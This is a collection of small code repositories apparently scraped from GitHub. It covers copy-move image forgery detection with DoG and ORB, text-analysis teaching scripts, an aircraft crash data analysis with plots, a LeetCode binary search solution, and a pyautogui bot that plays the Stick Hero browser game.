"text": "#!/usr/bin/env python\n\n\nfrom datetime import datetime\nfrom skimage.feature import blob_dog,match_descriptors\nfrom math import sqrt\nimport cv2\nimport numpy as np\nimport scipy\nfrom scipy import ndimage\nfrom scipy.spatial import distance\nimport glob, os\nimport math\n\n\n\n# Initiate orb detector\norb = cv2.ORB_create(1000)\n# create BFMatcher\nmatcher = cv2.DescriptorMatcher_create(cv2.DescriptorMatcher_BRUTEFORCE_HAMMING)\n\ndef sobel_f(im1):\n\timage =im1.astype (int)\n\t# derivatives\n\tdx=ndimage.sobel(image, 1)\n\tdy=ndimage.sobel(image, 0)\n\tmag=np.hypot(dx, dy)\n\t# normalization\n\tmag*= 255.0 / np.max(mag)\n\tsobel_im1 = np.uint8(mag)\n\treturn sobel_im1\n\n\ndef dog_f(im1_gray):\n\tblobs_dog = blob_dog(im1_gray, max_sigma=40, threshold=.1)\n\tblobs_dog[:, 2] = blobs_dog[:, 2] * sqrt(2)\n\treturn blobs_dog\n\n\ndef show_f(blobs_all):\n\tblob_area =[]\n\tblobs_list = [blobs_all]\n\tfor blobs in blobs_list:\n\t\tfor blob in blobs:\n\t\t\ty, x, r = blob\n\t\t\tarea = [y,x,r] \n\t\t\tif 2*r > 1:\n\t\t\t\t#print area\n\t\t\t\tblob_area.append(area) \n\treturn blob_area\n\nif __name__=='__main__':\n\ti = 0\n\timages = [image for image in sorted(glob.glob('*.jpg'))]\n\tfor im in images:\n\t\tprint(im)\n\t\tstart_time = datetime.now()\n\t\tim1 = cv2.imread (im)\n\t\tsobel_image = sobel_f(im1)\n\t\tsobel_gray =cv2.cvtColor(sobel_image, cv2.COLOR_BGR2GRAY)\n\t\tim2_gray =cv2.cvtColor(im1, cv2.COLOR_BGR2GRAY)\n\t\tblobs_all = dog_f(sobel_gray)\n\t\toutput = show_f(blobs_all)\n\t\tclone1 = im1.copy()\n\t\tkey,des = orb.detectAndCompute(im2_gray, None)\n\t\t#print('keypoints :',len(key),'...',len(des))\n\t\tsrc = np.array([]).reshape(-1,1,2)\n\t\tdst = np.array([]).reshape(-1,1,2)\n\t\tgeom = 0\n \n\t\tll =[]\n\t\tfor b0 in range(0,len(output)):\n\t\t\tb0y,b0x,b0r = output[b0]\n\t\t\tcv2.circle(clone1, (int(b0x),int(b0y)), int(b0r), (0, 0, 250), 1) \n\t\t\tl =[]\n\t\t\tkp_1 =[]\n\t\t\tds_1 =[]\n\t\t\tl3 =[]\n\t\t\tindex= 0\n\t\t\tfor k,d in zip(key,des):\n\t\t\t\tif (k.pt[0] - b0x)**2 + (k.pt[1] - b0y)**2 <= (b0r **2):\n\t\t\t\t\tl.append(index)\n\t\t\t\t\t#print('l :',len(l))\n\t\t\t\t\tkp_1.append(k)\n\t\t\t\t\tds_1.append(d)\n\t\t\t\tindex+=1\n\t\t\tif l:\n\t\t\t\tkp_2= np.delete(key,l,axis=0)\n\t\t\t\tds_2 = np.delete(des,l,axis=0)\n\t\t\t\t#print('k :',len(kp),'...',len(ds))\n\t\t\t\t#nn_matches = bf.match(np.array(ds_1),ds_2)\n\t\t\t\tnn_matches = matcher.knnMatch(np.array(ds_1), ds_2, 2)\n\t\t\t\t#print(nn_matches)\n\t\t\t\tgood = []\n\t\t\t\t#matched1 = []\n\t\t\t\t#matched2 = []\n\t\t\t\tnn_match_ratio = 0.6 # Nearest neighbor matching ratio\n\t\t\t\tfor m, n in nn_matches:\n\t\t\t\t\t#print(m)\n\t\t\t\t\t#Use 2-nn matches and ratio criterion to find correct keypoint matches\n\t\t\t\t\t#If the closest match distance is significantly lower than the second closest one, then the match is correct (match is not ambiguous).\n\t\t\t\t\tif m.distance < nn_match_ratio * n.distance:\n\t\t\t\t\t\t#print(x1,y1,x2,y2)\n\t\t\t\t\t\tgood.append(m)\n\n\n\t\t\t\tMIN_MATCH_COUNT = 3\n\t\t\t\tif len(good) > MIN_MATCH_COUNT:\n\t\t\t\t\tsrc_pts = np.float32([kp_1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)\n\t\t\t\t\tdst_pts = np.float32([kp_2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)\n\t\t\t\t\t#src = np.concatenate((src,src_pts))\n\t\t\t\t\t#dst = np.concatenate((dst,dst_pts))\n\t\t\t\t\tsrc = np.array(src_pts).ravel()\n\t\t\t\t\tdst = np.array(dst_pts).ravel()\n\t\t\t\t\tps =np.array(src).reshape((-1,2))\n\t\t\t\t\tpd =np.array(dst).reshape((-1,2))\n\t\t\t\t\tfor k1,k2 in zip(ps,pd):\n\t\t\t\t\t\tcv2.circle(clone1, (int(k1[0]),int(k1[1])),4,(0,0,255),-1)\n\t\t\t\t\t\tcv2.circle(clone1, (int(k2[0]),int(k2[1])),4,(0,255,255),-1)\n\t\t\t\t\t\tcv2.line(clone1,(int(k1[0]),int(k1[1])),(int(k2[0]),int(k2[1])),(0,255,0),2) \n\t\t#cv2.imshow('image',clone1)\n\t\tcv2.imwrite('detectionz-results__'+str(i)+'.png',clone1) \n\t\tend_time = datetime.now()\n\t\tprint('Duration: {}'.format(end_time - start_time))\n\t\ti += 1\n\tcv2.waitKey(0)\n\tcv2.destroyAllWindows()\n\n\n\n\n"
},
{
"alpha_fraction": 0.8185776472091675,
"alphanum_fraction": 0.8185776472091675,
"avg_line_length": 343.5,
"blob_id": "e80f83d325d571ed3617046b4aa8587fdaf55175",
"content_id": "ce69f23ef64d9b36d72c8d853712fd214ff91514",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 695,
"license_type": "no_license",
"max_line_length": 650,
"num_lines": 2,
"path": "/README.md",
"repo_name": "niyishakapatrick/Copy-Move-forgery-detection-using-DoG-and-ORB",
"src_encoding": "UTF-8",
"text": "# DoG-ORB-copy-move-forgery-detection\nCopy–Move forgery or Cloning is a type of image tampering where a part of the image is copied and pasted on another part of same image. Due to availability of powerful Image editing software, the process of malicious manipulation,editing and creating fake images has been tremendously simple. Thus, there is a need of robust passive– blind image forensics(PBIF) techniques to validate the authenticity of digital Images. A Copy–move forgery detection technique using DoG (Difference of Gaussian) blob detector to detect regions in image, with rotation invariant and resistant to noise feature called ORB (Oriented Fast and Rotated Brief) is proposed.\n"
}
] | 2 |
cderose/text-analysis-2016 | https://github.com/cderose/text-analysis-2016 | d08e1746f7435db15bc7d0de979bb93bfd8ad561 | 9658cb7f244c51f4fabe6fedbb6f4a22f15954d1 | 8390804d9a5d724cc04d176d0e2953432f981162 | refs/heads/master | 2020-03-16T19:30:22.683815 | 2017-04-10T22:57:29 | 2017-04-10T22:57:29 | 132,919,008 | 0 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.7519736886024475,
"avg_line_length": 30.020408630371094,
"blob_id": "68d7eb4c5d82bf6eb4b64908d3f5f473847fee25",
"content_id": "83d7e7d7aa599cbb2d6f835d10e05394fce49e95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1520,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 49,
"path": "/06-Literary Distinction (Probably)/literary_patterns-solution.py",
"repo_name": "cderose/text-analysis-2016",
"src_encoding": "UTF-8",
"text": "import os\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\n\n# Assign file paths to each set of poems\nreview_path = 'poems/reviewed/'\nrandom_path = 'poems/random/'\n\n# Get lists of text files in each directory\nreview_files = os.listdir(review_path)\nrandom_files = os.listdir(random_path)\n\n# Read in texts as strings from each location\nreview_texts = [open(review_path+file_name).read() for file_name in review_files]\nrandom_texts = [open(random_path+file_name).read() for file_name in random_files]\n\n# Collect all texts in single list\nall_texts = review_texts + random_texts\n\n# Get all file names together\nall_file_names = review_files + random_files\n\n# Keep track of classes with labels\nall_labels = ['reviewed'] * len(review_texts) + ['random'] * len(random_texts)\n\n# Intitialize the function that will transform our list of texts to a DTM\ncv = CountVectorizer(stop_words = 'english', min_df=180, binary = True, max_features = None)\n\n# Transform our texts to DTM\ndtm = cv.fit_transform(all_texts).toarray()\n\n# Train the classifier and assign it to a variable\nnb = MultinomialNB()\nnb.fit(dtm, all_labels)\n\n# Canonic file path\ncanonic_path = 'poems/canonic/'\n\n# Get list of file names in canonic directory\ncanonic_files = os.listdir(canonic_path)\n\n# Read in canonic texts\ncanonic_texts = [open(canonic_path+file_name).read() for file_name in canonic_files]\n\n# Transform into DTM\ncanonic_dtm = cv.transform(canonic_texts)\n\n# Make predictions\nnb.predict(canonic_dtm)\n"
},
{
"alpha_fraction": 0.7463898658752441,
"alphanum_fraction": 0.7527076005935669,
"avg_line_length": 30.657142639160156,
"blob_id": "2a38927d3abef22d1d5e642a69cc26eedbd286bc",
"content_id": "6122afe1f6de674eaf45bbe9e5f4e9198cae14c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1108,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 35,
"path": "/03-Operationalizing/antigone solution.py",
"repo_name": "cderose/text-analysis-2016",
"src_encoding": "UTF-8",
"text": "import pandas\n\n# Tells Jupyter to produce images in notebook\n% pylab inline\n\n# Makes images look good\nstyle.use('ggplot')\n\n# Read spreadsheet from the hard drive\ndialogue_df = pandas.read_csv('antigone_dialogue.csv', index_col=0)\n\n# Create a list of lists; split each character's dialogue into a list of tokens\ndialogue_tokens = [character.split() for character in dialogue_df['DIALOGUE']]\n\n# How many tokens are in each list?\ndialogue_len = [len(tokens) for tokens in dialogue_tokens]\n\n# Assign this as a new column in the dataframe\ndialogue_df['WORDS_SPOKEN'] = dialogue_len\n\n# Get the total number of words\ntotal_words = sum(dialogue_df['WORDS_SPOKEN'])\n\n# Use that total to normalize the share of words belonging to each character\n# Multiply by 100 to convert to percentage\npercent_by_character = dialogue_df['WORDS_SPOKEN'] / total_words * 100\n\n# Add it as a new column to the dataframe\ndialogue_df['WORDS_PCT'] = percent_by_character\n\n# Re-sort in order of most prominent speaker\ndialogue_df = dialogue_df.sort_values('WORDS_PCT',ascending=False)\n\n# Visualize\ndialogue_df['WORDS_PCT'].plot(kind='bar')\n"
}
] | 2 |
howardsuuu/Aircraft_crasher_data_analysis | https://github.com/howardsuuu/Aircraft_crasher_data_analysis | 87c62cdc0491101c7196376a5bfceed185ba4f18 | 04cf0da18dd269c80b28c79a8da0a0edcca02f05 | ad26ac703b73bca3e5632dee453bd2eac0c8c180 | refs/heads/master | 2020-05-01T14:42:42.895441 | 2019-08-28T17:53:51 | 2019-08-28T17:53:51 | 177,527,712 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6563209891319275,
"alphanum_fraction": 0.6669189929962158,
"avg_line_length": 29,
"blob_id": "19cbef70463e6720d9be2b3f5b94012c840c2bf3",
"content_id": "dfb5046f620e2aeef0b6fe7fedc4bafb46a49dd7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1321,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 44,
"path": "/Aircraft_Crashing.py",
"repo_name": "howardsuuu/Aircraft_crasher_data_analysis",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport numpy as np\n# Read csv files\ndt = pd.read_csv(r\"/Users/howardsu666/Github/Data_analysis\"\n r\"/Aivation Accident\"\n r\"/Airplane_Crashes_and_Fatalities_Since_1908.csv\")\ndt['Date'] = dt['Date'].map(pd.to_datetime)\n#print(dt['Date'].head())\n\n# Create a new column, weekday based on the history date\ndef get_weekday(dataWeekday):\n return dataWeekday.weekday()\ndt['Weekday'] = dt['Date'].map(get_weekday)# can also using .apply()\n#print(dt['Weekday'])\n\n# To see the Freq of the crashing based on the weekdays\ndef count_row(rows):\n return len(rows)\nby_weekdays = dt.groupby('Weekday').apply(count_row)# Groupby - is a DataFrame\n#plt.bar(range(0,7), by_weekdays)\n#plt.xticks(range(0,7), ('Mon', 'Tue', 'Wen', 'Thu', 'Fri', 'Sat', 'Sun'))\n#plt.xlabel('Weekday')\n#plt.ylabel('Freq')\n#plt.title('Freq by Weekdays')\n#plt.show()\n\n# Create a new column, year based on the 'Date' column\n\ndt['Year'] = dt['Date'].dt.year\nplt.plot(dt['Year'], '.', ms = 0.5, alpha = .5)\nplt.xlabel('Freq')\nplt.ylabel('Year')\n#ax = plt.gca()\n#ax.invert_yaxis() Invert the y axis\nplt.title('Freq by Years')\nplt.show()\nplt.close()\n# Dot plot for\n\n# To see which Type of Aircraft \n#print(dt['Type'].describe())\n#print(dt['Type'].value_counts())\n\n"
},
{
"alpha_fraction": 0.6017845869064331,
"alphanum_fraction": 0.6468147039413452,
"avg_line_length": 36.944881439208984,
"blob_id": "ef28471de3bbfbcca1f18b84efa0c9070d7a2483",
"content_id": "f0ab1185d1daa03a984f906f8b9c6ada19611aa3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4819,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 127,
"path": "/Air_acc.py",
"repo_name": "howardsuuu/Aircraft_crasher_data_analysis",
"src_encoding": "UTF-8",
"text": "import numpy as np \nimport pandas as pd \nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom datetime import date, timedelta, datetime\n\nData = pd.read_csv(r\"/Users/howardsu666/Github/Data_analysis\"\n r\"/Aivation Accident\"\n r\"/Airplane_Crashes_and_Fatalities_Since_1908.csv\")\n\n#print(Data.isnull().sum())\n\n# Cleaning\nData['Time'] = Data['Time'].replace(np.nan, '00:00') \nData['Time'] = Data['Time'].str.replace('c: ', '')\nData['Time'] = Data['Time'].str.replace('c:', '')\nData['Time'] = Data['Time'].str.replace('c', '')\nData['Time'] = Data['Time'].str.replace('12\\'20', '12:20')\nData['Time'] = Data['Time'].str.replace('18.4', '18:40')\nData['Time'] = Data['Time'].str.replace('0943', '09:43')\nData['Time'] = Data['Time'].str.replace('22\\'08', '22:08')\nData['Time'] = Data['Time'].str.replace('114:20:00', '00:00')\nData['Time'] = Data['Time'].str.replace('009:43', '0943')\nData['Time'] = Data['Time'].str.replace('18:400', '18:40')\nData['Time'] = Data['Time'].str.replace('18:401', '18:41')\nData['Time'] = Data['Time'].str.replace('18:402', '18:42')\nData['Time'] = Data['Time'].str.replace('18:403', '18:43')\nData['Time'] = Data['Time'].str.replace('18:404', '18:44')\nData['Time'] = Data['Time'].str.replace('18:405', '18:45')\nData['Time'] = Data['Time'].str.replace('18:406', '18:46')\nData['Time'] = Data['Time'].str.replace('18:407', '18:47')\nData['Time'] = Data['Time'].str.replace('18:408', '18:48')\nData['Time'] = Data['Time'].str.replace('18:409', '18:49')\nData['Time'] = Data['Time'].str.replace('114:20', '00:00')\n\n\n#print(type(set(Data['Time'])))\n#print(type(Data['Time']))\nData['Time'] = Data['Date'] + ' ' + Data['Time'] #joining two rows\n\n# integrate two col \ndef todate(a):\n return datetime.strptime(a, '%m/%d/%Y %H:%M')\n\nData['Time'] = Data['Time'].apply(todate)\n\n\n#print('Date ranges from ' + str(Data.Time.min()) + ' to ' + str(Data.Time.max()))\n#print(Data['Time'])\nData.Operator = Data.Operator.str.upper()\n\n\n\n# Visual the data: Total accidents \n# dt is to tell the series to use date data type\n# [['Date\"]] makes it change from series to dataframe\ntemporary_data = Data.groupby(Data.Time.dt.year)[['Date']].count()\nprint(temporary_data)# data frame\n\n# replace name Date into Count in the dataframe\ntemporary_data = temporary_data.rename(columns = {\"Date\": \"Count\"})\nplt.style.use('ggplot')\nplt.figure(figsize= (11,5))# define a window for barplot\n# Need to put index, showing the true year instead of from 0\nplt.plot(temporary_data.index, 'Count', data = temporary_data, color = 'red', \\\n marker = '.', linewidth = 1.)\nplt.xlabel('Year', fontsize = 12)\nplt.ylabel('Count', fontsize = 12)\nplt.title('Accidents frequency by Years', loc = 'Center', fontsize = 14)\nplt.show()\n\n\n\nimport matplotlib.pylab as pl\nimport matplotlib.gridspec as gridspec\n\ngG = gridspec.GridSpec(2,2)\n\npl.figure(figsize= (15,10))\nplt.style.use('seaborn-muted')\n\n# count by month\nax = pl.subplot(gG[0, :]) # both row/col are 0\nplt.bar(\n Data.groupby(Data.Time.dt.month)[['Date']]\n .count().index, 'Date', data=Data.groupby(Data.Time.dt.month)[['Date']]\n .count(), color='lightskyblue', linewidth=2\n)\nplt.xticks(Data.groupby(Data.Time.dt.month)[['Date']].count().index, ['Jan', \\\n 'Feb', 'Mar', 'Apr','May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'])\nplt.xlabel('Month', fontsize=10)\nplt.ylabel('Count', fontsize=10)\nplt.title('Count of accidents by Month', loc='Center', fontsize=14)\n\n# counts by week\nax = pl.subplot(gG[1, 0])\nsns.barplot(Data.groupby(Data.Time.dt.weekday)[['Date']].count().index, 'Date', \\\n data=Data.groupby(Data.Time.dt.weekday) \\\n [['Date']].count(), color='lightskyblue', linewidth=2)\nplt.xticks(Data.groupby(Data.Time.dt.weekday)[['Date']].count().index, ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun'])\nplt.xlabel('Day of Week', fontsize=10)\nplt.ylabel('Count', fontsize=10)\nplt.title('Count of accidents by Day of Week', loc='Center', fontsize=14)\n\n# counts by hour\nax = pl.subplot(gG[1, 1])\nsns.barplot(Data[Data.Time.dt.hour != 0].groupby(Data.Time.dt.hour) \\\n [['Date']].count().index, 'Date', data=Data[Data.Time.dt.hour != 0] \\\n .groupby(Data.Time.dt.hour)[['Date']].count(),color ='lightskyblue', \\\n linewidth=2)\nplt.xlabel('Hour', fontsize=10)\nplt.ylabel('Count', fontsize=10)\nplt.title('Count of accidents by Hour', loc='Center', fontsize=14)\nplt.tight_layout()# prvent different subplot stack together\nplt.show()\n\n\n# Compare the civil and military with visual\n'''Data_2 = Data.copy()\nData_2['isMilitary'] = Data_2.Operator.str.contains('MILITARY')\nData_2['Military'] = Data_2.groupby('isMilitary')[['isMilitary']].count()\nData_2.index = ['Passenger', 'Military']\n\nData_3 = Data.copy()\nData_2['isMilitary'] = Data_2.Operator.str.contains('MILITARY')\n\nData_3 = Data['isMilitary'] == False'''\n"
},
{
"alpha_fraction": 0.7108614444732666,
"alphanum_fraction": 0.7880150079727173,
"avg_line_length": 132.39999389648438,
"blob_id": "79bbc4c20007d2417964f6b212eedb934d51484b",
"content_id": "6980e8e2645e14a6f6ee83d21982d5613024912f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1335,
"license_type": "no_license",
"max_line_length": 624,
"num_lines": 10,
"path": "/README.md",
"repo_name": "howardsuuu/Aircraft_crasher_data_analysis",
"src_encoding": "UTF-8",
"text": "# Aircraft_crasher_data_analysis\n## This dataset includes the airplane crahed that ranged from 1908 to 2009 Along with other categories: Time, Type, Fatalities, summary .etc I analyzed some cross relationship and present with the visuals.\n### I use Python well-known data analytics packages, numpy, panda, matplotlib, and seaborn to analyze this dataset.\nI manually found out some errors (Time format error) in the dataset and delete it, you can refer to my code for more detail\n\n#### Result: 1. The chart indicates the accident frequencies increased dramatically during 1940s which is WWII period. 2. Also, the chart shows during the 1960s, the frequency went high again, it might because of the introduction of the jet planes, which wasn't and mature technology then. 3. It seems that Jan, Aug, and Dec have the highest freqency among Month (Might because of the vacation season.) 4. For the accidents by day of week, each day seems average to me. 5. For the count of accidents by Hour, the image shows 9-10 am, 7 pm have the hightest frequencies due to they are the rush hour in the aviation industry.\n\n\n\n\n\n"
}
] | 3 |
roryxr/CodingPractice | https://github.com/roryxr/CodingPractice | e76a07e452fefda3ed00a5d8cd370ef9f9b9d1e0 | 40df64b261c196b7c99c91650e422240e580569d | 29ae0b78dd3e4fd0a83518b56fa442d07ca7748f | refs/heads/master | 2021-01-12T06:21:08.954792 | 2017-01-29T23:04:25 | 2017-01-29T23:04:25 | 77,345,752 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4771929681301117,
"alphanum_fraction": 0.5216374397277832,
"avg_line_length": 19.85365867614746,
"blob_id": "2f38d3385d641fa97049a36e57fb797709b32c77",
"content_id": "43790d3b49b13ac950cbacdf9eac0449da23e879",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 855,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 41,
"path": "/Leetcode/Q278/Solution.java",
"repo_name": "roryxr/CodingPractice",
"src_encoding": "UTF-8",
"text": "public class Solution {\n public static void main(String[] args) {\n Solution s = new Solution();\n s.firstBadVersion2(2126753390);\n System.out.println(\"Separator\");\n s.firstBadVersion(2126753390);\n }\n\n public int firstBadVersion(int n) {\n int lb = 1, ub = n;\n while (lb < ub) {\n int mid = (lb + ub) / 2;\n System.out.println(mid);\n if (!isBadVersion(mid)) {\n lb = mid + 1;\n } else {\n ub = mid;\n }\n }\n return lb;\n }\n\n public int firstBadVersion2(int n) {\n int lb = 1, ub = n;\n while (lb < ub) {\n int mid = lb + (ub - lb) / 2;\n System.out.println(mid);\n if (!isBadVersion(mid)) {\n lb = mid + 1;\n } else {\n ub = mid;\n }\n }\n return lb;\n }\n\n private boolean isBadVersion(int v) {\n if (v >= 1702766719) return true;\n return false;\n }\n}\n"
},
{
"alpha_fraction": 0.6357388496398926,
"alphanum_fraction": 0.6408934593200684,
"avg_line_length": 20.55555534362793,
"blob_id": "5c4652f0351600beb1a42736ec97a07cc47ec72a",
"content_id": "9b97bf5abb94382e64b68cf8f09f5a3fe19678c7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 582,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 27,
"path": "/tools/quick-coding-practice-setup.py",
"repo_name": "roryxr/CodingPractice",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\nimport sys\nimport os\nimport stat\n\nif len(sys.argv) < 2:\n sys.exit('Usage: %s <directory-name>' % sys.argv[0])\n\ndir_path = sys.argv[1]\nif not os.path.exists(dir_path):\n os.makedirs(dir_path);\nelse:\n sys.exit('Directory %s already exists' % dir_path)\n\nf = open(dir_path + '/Solution.java', 'w')\nf.write('public class Solution {\\n\\n}')\nf.close()\n\nf = open(dir_path + '/run', 'w')\nf.write('#!/bin/bash\\n')\nf.write('javac Solution.java\\n')\nf.write('java Solution\\n')\nf.close()\n\nst = os.stat(dir_path + '/run')\nos.chmod(dir_path + '/run', st.st_mode | stat.S_IEXEC)\n"
}
] | 2 |
ishitavarshney/insidesherpaJP | https://github.com/ishitavarshney/insidesherpaJP | 67be3bb9d30f13e33fa36166c93e3b77da299189 | 918ab751c05322f178dead0084db215dd8320ba8 | 281fdefb15a153b24d0cadabe8c8f59834f95e92 | refs/heads/main | 2023-01-13T06:46:03.545227 | 2020-11-08T17:35:55 | 2020-11-08T17:35:55 | 311,117,214 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4460492730140686,
"alphanum_fraction": 0.5739167332649231,
"avg_line_length": 48.04166793823242,
"blob_id": "d9e8c93248c6f72cb441688ac5db73cf1bd9c379",
"content_id": "ba8a5410a7583b7a802bf06f28d9069f8e4c3bc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2354,
"license_type": "no_license",
"max_line_length": 174,
"num_lines": 48,
"path": "/client_test.py",
"repo_name": "ishitavarshney/insidesherpaJP",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom client3 import getDataPoint,getRatio\n\nclass ClientTest(unittest.TestCase):\n def test_getDataPoint_calculatePrice(self):\n quotes = [\n {'top_ask': {'price': 121.2, 'size': 36}, 'timestamp': '2019-02-11 22:06:30.572453', 'top_bid': {'price': 120.48, 'size': 109}, 'id': '0.109974697771', 'stock': 'ABC'},\n {'top_ask': {'price': 121.68, 'size': 4}, 'timestamp': '2019-02-11 22:06:30.572453', 'top_bid': {'price': 117.87, 'size': 81}, 'id': '0.109974697771', 'stock': 'DEF'}\n ]\n for q in quotes:\n self.assertEqual(getDataPoint(q),[q['stock'],q['top_bid']['price'],q['top_ask']['price'],(q['top_bid']['price']+q['top_ask']['price'])/2])\n\n def test_getDataPoint_calculatePriceBidGreaterThanAsk(self):\n quotes = [\n {'top_ask': {'price': 119.2, 'size': 36}, 'timestamp': '2019-02-11 22:06:30.572453', 'top_bid': {'price': 120.48, 'size': 109}, 'id': '0.109974697771', 'stock': 'ABC'},\n {'top_ask': {'price': 121.68, 'size': 4}, 'timestamp': '2019-02-11 22:06:30.572453', 'top_bid': {'price': 117.87, 'size': 81}, 'id': '0.109974697771', 'stock': 'DEF'}\n ]\n \"\"\" ------------ Add the assertion below ------------ \"\"\"\n for q in quotes:\n self.assertEqual(getDataPoint(q),[q['stock'],q['top_bid']['price'],q['top_ask']['price'],(q['top_bid']['price']+q['top_ask']['price'])/2])\n\n def test_getDataPoint_calculatePriceBidLesserThanAsk(self):\n quotes = [\n {'top_ask': {'price': 119.2, 'size': 36}, 'timestamp': '2019-02-11 22:06:30.572453', 'top_bid': {'price': 112.53, 'size': 109}, 'id': '0.109974697771', 'stock': 'ABC'},\n {'top_ask': {'price': 121.68, 'size': 4}, 'timestamp': '2019-02-11 22:06:30.572453', 'top_bid': {'price': 117.87, 'size': 81}, 'id': '0.109974697771', 'stock': 'DEF'}\n ]\n \"\"\" ------------ Add the assertion below ------------ \"\"\"\n for q in quotes:\n self.assertEqual(getDataPoint(q),[q['stock'],q['top_bid']['price'],q['top_ask']['price'],(q['top_bid']['price']+q['top_ask']['price'])/2])\n\n\n\n \"\"\" ------------ Add more unit tests ------------ \"\"\"\n def test_getRatio(self):\n price_a=119.34\n price_b=120.72\n self.assertEqual(getRatio(price_a,price_b),price_a/price_b)\n\n def test_getRatioWhenDenominatorIs0(self):\n price_a=120.32\n self.assertEqual(getRatio(price_a,0.0),None)\n\n \n\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.8714285492897034,
"alphanum_fraction": 0.8714285492897034,
"avg_line_length": 34,
"blob_id": "0ed261a5245b142b80833303c0c643063f4df28d",
"content_id": "d0f9459747277212eb5668126db864c792662ced",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 70,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 2,
"path": "/README.md",
"repo_name": "ishitavarshney/insidesherpaJP",
"src_encoding": "UTF-8",
"text": "# insidesherpaJP\nInsidesherpa JP Morgan virtual internship experience\n"
}
] | 2 |
abdazmi/Stick-Hero-Automated | https://github.com/abdazmi/Stick-Hero-Automated | d9e94783d1a42ed9dda47f4141f176fecdd1dfa2 | d1c11b6d27029a360071494270f27bbdbd815f41 | 93597b6a88954c4d346b02afd0909254565d7cdb | refs/heads/main | 2023-06-19T00:29:15.596956 | 2021-07-10T23:11:14 | 2021-07-10T23:11:14 | 381,467,598 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5516709685325623,
"alphanum_fraction": 0.6041131019592285,
"avg_line_length": 26.785715103149414,
"blob_id": "4704b5030ae584f965a1abcf2ff965d514a08e78",
"content_id": "91fc8124543ee628d6225c3f95bc81b400058e59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1945,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 70,
"path": "/main.py",
"repo_name": "abdazmi/Stick-Hero-Automated",
"src_encoding": "UTF-8",
"text": "from pprint import pprint\nfrom time import sleep\nimport keyboard\nimport win32api\nimport win32con\nimport pyautogui\n\n\n# https://www.silvergames.com/en/stick-hero\n\n# RGB for hill: ( 41, 29, 20)\n# 1 start of screen X: 752 Y: 776\n# 2 end of screen X: 1165 Y: 776\n\n# starting point of the game screen\nx = 752\ny = 776\n# width = 1165 - 752\nwidth = 413\n\nwhile keyboard.is_pressed('q') == False:\n pyautogui.FAILSAFE = True\n sleep(2)\n all_colors = []\n for ww in range(width):\n try:\n r, g, b = pyautogui.pixel(x + ww, y)\n all_colors.append([r, g, b])\n except:\n continue\n # pprint(all_colors)\n\n to_split = {}\n for i, j in enumerate(all_colors):\n r, g, b = j\n if r == 41 and g == 29 and b == 20:\n to_split.update({i: j})\n pprint(to_split)\n\n starting_index = int(list(to_split.keys())[0])\n first_cliff = None\n next_cliff = None\n for key in to_split:\n if int(key) == starting_index:\n starting_index += 1\n first_cliff = (key, to_split[key])\n else:\n next_cliff = (key, to_split[key])\n break\n print(first_cliff)\n print(next_cliff)\n\n first_cliff_width = first_cliff[0] - int(list(to_split.keys())[0])\n space_in_between = int(next_cliff[0]) - int(first_cliff[0])\n second_cliff_width = int(list(to_split.keys())[-1]) - int(next_cliff[0])\n stick_length = space_in_between + (second_cliff_width / 2)\n\n print(first_cliff_width)\n print(space_in_between)\n print(second_cliff_width)\n print(stick_length)\n\n pyautogui.moveTo(950, 415)\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN, 0, 0)\n sleep(space_in_between * 0.0032 + second_cliff_width * 0.0009)\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP, 0, 0)\n\n # pyautogui.mouseDown(x=950, y=415, button='left')\n # sleep(space_in_between*0.0027)\n # pyautogui.mouseUp(x=950, y=415, button='left')\n"
},
{
"alpha_fraction": 0.714031994342804,
"alphanum_fraction": 0.7850799560546875,
"avg_line_length": 45.91666793823242,
"blob_id": "f3dc6be01f77fb225a94d68196217ba7a7c25aed",
"content_id": "9adde76db509b9b356891e4c17b549cf117d8a97",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 563,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 12,
"path": "/README.md",
